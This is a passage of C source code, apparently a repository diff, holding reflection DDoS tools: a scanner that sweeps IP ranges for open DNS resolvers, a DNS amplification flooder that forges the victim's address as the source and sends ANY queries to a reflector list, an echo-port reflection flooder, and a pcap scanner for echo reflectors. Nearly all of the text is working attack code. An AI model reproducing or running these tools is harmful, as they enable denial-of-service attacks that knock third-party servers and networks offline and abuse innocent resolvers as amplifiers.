if(data_size <0 )
|
||||
{
|
||||
printf("Recvfrom error , failed to get packets\n");
|
||||
exit(1);
|
||||
}
|
||||
struct iphdr *iph = (struct iphdr*)buffer;
|
||||
if(iph->protocol == 17)
|
||||
{
|
||||
unsigned short iphdrlen = iph->ihl*4;
|
||||
struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);
|
||||
unsigned char* payload = buffer + iphdrlen + 8;
|
||||
if(ntohs(udph->source) == 53)
|
||||
{
|
||||
int body_length = data_size - iphdrlen - 8;
|
||||
struct DNS_HEADER *dns = (struct DNS_HEADER*) payload;
|
||||
if(dns->ra == 1)
|
||||
{
|
||||
found_srvs++;
|
||||
fprintf(fd,"%s . %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
close(sock_raw);
|
||||
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <class a start> <class a end> <outfile> <threads> <scan delay in ms>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
|
||||
pthread_t listenthread;
|
||||
pthread_create( &listenthread, NULL, &recievethread, NULL);
|
||||
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = strcat(str_start,argv[1]);
|
||||
str_start = strcat(str_start,".0.0.0");
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = strcat(str_end,argv[2]);
|
||||
str_end = strcat(str_end,".255.255.255");
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
sleep(1);
|
||||
printf("Starting Scan...\n");
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Found");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Host/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "B/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Running Thrds");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Done");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,388 @@
|
|||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
#define PACKETS_PER_RESOLVER 5
|
||||
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
char domain[256];
|
||||
int line;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
|
||||
struct thread_data{
|
||||
int thread_id;
|
||||
struct list *list_node;
|
||||
struct sockaddr_in sin;
|
||||
int port;
|
||||
};
|
||||
|
||||
struct DNS_HEADER
|
||||
{
|
||||
unsigned short id; // identification number
|
||||
|
||||
unsigned char rd :1; // recursion desired
|
||||
unsigned char tc :1; // truncated message
|
||||
unsigned char aa :1; // authoritive answer
|
||||
unsigned char opcode :4; // purpose of message
|
||||
unsigned char qr :1; // query/response flag
|
||||
|
||||
unsigned char rcode :4; // response code
|
||||
unsigned char cd :1; // checking disabled
|
||||
unsigned char ad :1; // authenticated data
|
||||
unsigned char z :1; // its z! reserved
|
||||
unsigned char ra :1; // recursion available
|
||||
|
||||
unsigned short q_count; // number of question entries
|
||||
unsigned short ans_count; // number of answer entries
|
||||
unsigned short auth_count; // number of authority entries
|
||||
unsigned short add_count; // number of resource entries
|
||||
};
|
||||
|
||||
//Constant sized fields of query structure
|
||||
struct QUESTION
|
||||
{
|
||||
unsigned short qtype;
|
||||
unsigned short qclass;
|
||||
};
|
||||
|
||||
//Constant sized fields of the resource record structure
|
||||
struct QUERY
|
||||
{
|
||||
unsigned char *name;
|
||||
struct QUESTION *ques;
|
||||
};
|
||||
|
||||
void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)
|
||||
{
|
||||
int lock = 0 , i;
|
||||
strcat((char*)host,".");
|
||||
|
||||
for(i = 0 ; i < strlen((char*)host) ; i++)
|
||||
{
|
||||
if(host[i]=='.')
|
||||
{
|
||||
*dns++ = i-lock;
|
||||
for(;lock<i;lock++)
|
||||
{
|
||||
*dns++=host[lock];
|
||||
}
|
||||
lock++; //or lock=i+1;
|
||||
}
|
||||
}
|
||||
*dns++='\0';
|
||||
}
|
||||
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
|
||||
for (i = 3; i < 4096; i++)
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
|
||||
/* function for header checksums */
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
|
||||
fprintf(stdout, "Thread %d started\n", td->thread_id);
|
||||
|
||||
char strPacket[MAX_PACKET_SIZE];
|
||||
int iPayloadSize = 0;
|
||||
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int iPort = td->port;
|
||||
|
||||
int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
|
||||
if(s < 0)
|
||||
{
|
||||
fprintf(stderr, "Could not open raw socket. You need to be root!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
//init random
|
||||
init_rand(time(NULL));
|
||||
|
||||
// Clear the data
|
||||
memset(strPacket, 0, MAX_PACKET_SIZE);
|
||||
|
||||
// Make the packet
|
||||
struct iphdr *iph = (struct iphdr *) &strPacket;
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + 38;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
|
||||
iPayloadSize += sizeof(struct iphdr);
|
||||
|
||||
|
||||
struct udphdr *udph = (struct udphdr *) &strPacket[iPayloadSize];
|
||||
udph->source = htons(iPort);
|
||||
udph->dest = htons(53);
|
||||
udph->check = 0;
|
||||
|
||||
iPayloadSize += sizeof(struct udphdr);
|
||||
|
||||
struct DNS_HEADER *dns = (struct DNS_HEADER *) &strPacket[iPayloadSize];
|
||||
dns->id = (unsigned short) htons(rand_cmwc());
|
||||
dns->qr = 0; //This is a query
|
||||
dns->opcode = 0; //This is a standard query
|
||||
dns->aa = 0; //Not Authoritative
|
||||
dns->tc = 0; //This message is not truncated
|
||||
dns->rd = 1; //Recursion Desired
|
||||
dns->ra = 0; //Recursion not available! hey we dont have it (lol)
|
||||
dns->z = 0;
|
||||
dns->ad = 0;
|
||||
dns->cd = 0;
|
||||
dns->rcode = 0;
|
||||
dns->q_count = htons(1); //we have only 1 question
|
||||
dns->ans_count = 0;
|
||||
dns->auth_count = 0;
|
||||
dns->add_count = htons(1);
|
||||
|
||||
iPayloadSize += sizeof(struct DNS_HEADER);
|
||||
|
||||
sin.sin_port = udph->source;
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) strPacket, iph->tot_len >> 1);
|
||||
|
||||
|
||||
char strDomain[256];
|
||||
int i;
|
||||
int iAdditionalSize = 0;
|
||||
while(1)
|
||||
{
|
||||
usleep(0);
|
||||
//set the next node
|
||||
list_node = list_node->next;
|
||||
|
||||
//Clear the old domain and question
|
||||
memset(&strPacket[iPayloadSize + iAdditionalSize], 0, iAdditionalSize);
|
||||
|
||||
//add the chosen domain and question
|
||||
iAdditionalSize = 0;
|
||||
|
||||
unsigned char *qname = (unsigned char*) &strPacket[iPayloadSize + iAdditionalSize];
|
||||
|
||||
strcpy(strDomain, list_node->domain);
|
||||
ChangetoDnsNameFormat(qname, strDomain);
|
||||
//printf("!!%s %d\n", list_node->domain, list_node->line);
|
||||
|
||||
iAdditionalSize += strlen(qname) + 1;
|
||||
|
||||
struct QUESTION *qinfo = (struct QUESTION *) &strPacket[iPayloadSize + iAdditionalSize];
|
||||
qinfo->qtype = htons(255); //type of the query , A , MX , CNAME , NS etc
|
||||
qinfo->qclass = htons(1);
|
||||
|
||||
iAdditionalSize += sizeof(struct QUESTION);
|
||||
|
||||
void *edns = (void *) &strPacket[iPayloadSize + iAdditionalSize];
|
||||
memset(edns+2, 0x29, 1);
|
||||
memset(edns+3, 0x23, 1);
|
||||
memset(edns+4, 0x28, 1);
|
||||
|
||||
|
||||
iAdditionalSize += 11;
|
||||
|
||||
//set new node data
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
|
||||
udph->len= htons((iPayloadSize + iAdditionalSize + 5) - sizeof(struct iphdr));
|
||||
iph->tot_len = iPayloadSize + iAdditionalSize + 5;
|
||||
|
||||
udph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
iph->check = csum ((unsigned short *) strPacket, iph->tot_len >> 1);
|
||||
|
||||
//send
|
||||
for(i = 0; i < PACKETS_PER_RESOLVER; i++)
|
||||
{
|
||||
sendto(s, strPacket, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
void ParseResolverLine(char *strLine, int iLine)
|
||||
{
|
||||
char caIP[32] = "";
|
||||
char caDNS[512] = "";
|
||||
|
||||
int i;
|
||||
char buffer[512] = "";
|
||||
|
||||
int moved = 0;
|
||||
|
||||
for(i = 0; i < strlen(strLine); i++)
|
||||
{
|
||||
if(strLine[i] == ' ' || strLine[i] == '\n' || strLine[i] == '\t')
|
||||
{
|
||||
moved++;
|
||||
continue;
|
||||
}
|
||||
|
||||
if(moved == 0)
|
||||
{
|
||||
caIP[strlen(caIP)] = (char) strLine[i];
|
||||
}
|
||||
else if(moved == 1)
|
||||
{
|
||||
caDNS[strlen(caDNS)] = (char) strLine[i];
|
||||
}
|
||||
}
|
||||
|
||||
//printf("Found resolver %s, domain %s!\n", caIP, caDNS);
|
||||
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
|
||||
head->data.sin_addr.s_addr=inet_addr(caIP);
|
||||
head->data.sin_port=htons(53);
|
||||
strcpy(head->domain, caDNS);
|
||||
head->line = iLine;
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
}
|
||||
else
|
||||
{
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
|
||||
new_node->data.sin_addr.s_addr=inet_addr(caIP);
|
||||
new_node->data.sin_port=htons(53);
|
||||
strcpy(new_node->domain, caDNS);
|
||||
new_node->prev = head;
|
||||
head->line = iLine;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 4)
|
||||
{
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP/hostname> <port to hit> <reflection file> <number threads to use> <time (optional)>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
head = NULL;
|
||||
|
||||
char *strLine = (char *) malloc(256);
|
||||
strLine = memset(strLine, 0x00, 256);
|
||||
|
||||
char strIP[32] = "";
|
||||
char strDomain[256] = "";
|
||||
|
||||
int iLine = 0; // 0 = ip, 1 = domain.
|
||||
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while(fgets(strLine, 256, list_fd) != NULL)
|
||||
{
|
||||
ParseResolverLine(strLine, iLine);
|
||||
iLine++;
|
||||
}
|
||||
|
||||
|
||||
int i = 0;
|
||||
int num_threads = atoi(argv[4]);
|
||||
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(0);
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
|
||||
int iPort = atoi(argv[2]);
|
||||
|
||||
printf("Flooding %s\n", argv[1], iPort);
|
||||
|
||||
for(i = 0; i < num_threads; i++)
|
||||
{
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
td[i].port = iPort;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
|
||||
if(argc > 4)
|
||||
{
|
||||
sleep(atoi(argv[5]));
|
||||
}
|
||||
else
|
||||
{
|
||||
while(1)
|
||||
{
|
||||
sleep(1);
|
||||
}
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,208 @@
|
|||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 4;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(7);
|
||||
udph->check = 0;
|
||||
memset((void *)udph + sizeof(struct udphdr), "\x0D\x0A\x0D\x0A", 4);
|
||||
udph->len=htons(sizeof(struct udphdr) + 4);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,305 @@
|
|||
#include <pcap.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h> // for exit()
|
||||
#include <string.h> //for memset
|
||||
#include <sys/ioctl.h>
|
||||
#include <net/if.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h> // for inet_ntoa()
|
||||
#include <net/ethernet.h>
|
||||
#include <netinet/udp.h> //Provides declarations for udp header
|
||||
#include <netinet/ip.h> //Provides declarations for ip header
|
||||
#include <pthread.h>
|
||||
#include <semaphore.h>
|
||||
#include <signal.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer);
|
||||
|
||||
struct buffer
|
||||
{
|
||||
void *data;
|
||||
int size;
|
||||
struct buffer *next;
|
||||
struct buffer *prev;
|
||||
};
|
||||
struct buffer *head;
|
||||
|
||||
char *ipv4;
|
||||
int processed,over,total,i,j;
|
||||
struct sockaddr_in dest;
|
||||
pthread_mutex_t buf_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
sem_t loop_sem;
|
||||
int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
|
||||
void *readthread()
|
||||
{
|
||||
struct buffer *ourhead = head;
|
||||
struct sockaddr_in saddr;
|
||||
while(1)
|
||||
{
|
||||
sem_wait(&loop_sem);
|
||||
while(ourhead->data == NULL){ ourhead = ourhead->next; }
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *buf = malloc(ourhead->size);
|
||||
int size = ourhead->size;
|
||||
memcpy(buf, ourhead->data, ourhead->size);
|
||||
free(ourhead->data);
|
||||
ourhead->data = NULL;
|
||||
ourhead->size = 0;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
memset(&saddr, 0, sizeof(saddr));
|
||||
struct iphdr *iph = (struct iphdr*)(buf + sizeof(struct ethhdr));
|
||||
saddr.sin_addr.s_addr = iph->saddr;
|
||||
struct udphdr *udph = (struct udphdr *)(buf + sizeof(struct ethhdr) + sizeof(struct iphdr));
|
||||
if(ntohs(udph->source) == 7)
|
||||
{
|
||||
int body_length = size - sizeof(struct ethhdr) - sizeof(struct iphdr) - sizeof(struct udphdr);
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
found_srvs++;
|
||||
}
|
||||
free(buf);
|
||||
processed++;
|
||||
ourhead = ourhead->next;
|
||||
}
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memcpy(buf, "\x0D\x0A\x0D\x0A", 4);
|
||||
int sizeofpayload = 4;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(7);
|
||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=sizeofpayload;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
usleep(sleep_between*1000);
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *printthread(void *argvs)
|
||||
{
|
||||
char **argv = (char **)argvs;
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
sleep(1);
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
sleep(1);
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Found");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Host/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "B/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Running Thrds");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Done");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
